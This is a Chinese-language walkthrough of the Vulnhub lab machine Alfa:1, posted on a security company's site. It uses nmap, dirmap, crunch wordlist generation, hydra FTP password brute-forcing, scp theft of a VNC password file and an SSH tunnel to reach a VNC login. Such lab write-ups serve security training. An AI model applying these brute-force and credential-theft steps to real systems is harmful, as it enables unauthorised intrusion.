网站导航

新闻资讯

当前位置:首页 > 新闻资讯

Vulnhub_Alfa:1

发布时间:2021-07-17

简要描述:

Vulnhub下载地址:
链接:https://pan.baidu.com/s/1GROpdsN9quDjAyBhTnHfIw
提取码:8xw70x01环境介绍攻击机:192.168.10.128
靶机:192.168.10.134
0x02信息收集先用nmap进行信息收...

详细介绍

Vulnhub下载地址:
链接:https://pan.baidu.com/s/1GROpdsN9quDjAyBhTnHfIw
提取码:8xw7

0x01环境介绍

攻击机:192.168.10.128
靶机:192.168.10.134

0x02信息收集

先用nmap进行信息收集

nmap -A -T4 -v -p- 192.168.10.134

image有ssh、ftp、http服务的端口,重点关注这几个

python3 dirmap.py -i http://192.168.10.134 -lcf

image很显眼的robots.txt文件
底下有个brainfuck
image

++++++++++[>+>+++>+++++++>++++++++++-]>>+++++++++++++++++.>>---.+++++++++++.------.-----.--.>>++++++++++++++++++.++.-----..-.+++.++.

解码地址:https://www.splitbrain.org/services/ook%E2%80%8B (当然还有其他的,能用就行)

image

0x03 检测

http://192.168.10.134/alfa-support

image大致的意思就是,他忘了密码,密码是他的宠物狗的名字加上后面三位数
利用ftp访问一下有啥东西,匿名登陆,我直接用Kali的文件输ftp://192.168.10.134这应该是他宠物狗的名字
imageimage

crunch 7 7 -t milo%%% -o 123.txt (生成最高7位 最低7位 % 代表数字 输出到123.txt)

image

0x04 利用

hydra -l thomas -P 123.txt -v -f 192.169.10.134 ftp

image利用ssh登陆ssh -p 65111 thomas@192.168.10.134
image查看有个user.txt
image看了下提权啥的,没啥思路,看下端口吧,5901端口是vnc端口(远程桌面)
image

scp -P 65111 thomas@192.168.10.134:/home/thomas/.remote_secret ./

-P 是端口的意思	将192.168.10.134的thomas目录下的/home/thomas.remote\_secret	复制到当前目录下./

imagessh搭建隧道

ssh -p 65111 -L 5901:localhost:5901 thomas@192.168.10.1334

image

vncviewer -passwd .remote_secret localhost:5901

利用vncviewer登陆自己的5901端口,密码是.remote_secret里的内容
image获得flag,管理员权限
image

0x05 总结(个人观点,仅供参考)

1、nmap有多种用法,具体还是得看个人习惯或者说哪个好用,像65111端口,我用nmap -sV -O 192.168.10.134是检测不到的

2、brainfuck解密,得上网搜,有时间一定写个脚本,去收集特征,下次遇到直接利用脚本进行判断

3、scp的使用,参考https://www.runoob.com/linux/linux-comm-scp.html

4、ssh搭建隧道,参考https://mp.weixin.qq.com/s/JR9tfIjewLR6cbHNcfA3Ew

5、vnc,是linux系统里的远程桌面,默认端口是5901,vncviewer的使用方法还在找,大概就是vncviewer 端口 (-passwd .remote_secret 如果有密码的话)


 


推荐产品

如果您有任何问题,请跟我们联系!

联系我们

Copyright © 武汉网盾科技有限公司 版权所有 备案号:鄂ICP备2023003462号-5

地址:武汉市东湖高新区光谷大道光谷世贸中心A栋23楼

在线客服 联系方式 二维码

服务热线

18696195380/18672920250

扫一扫,关注我们

关闭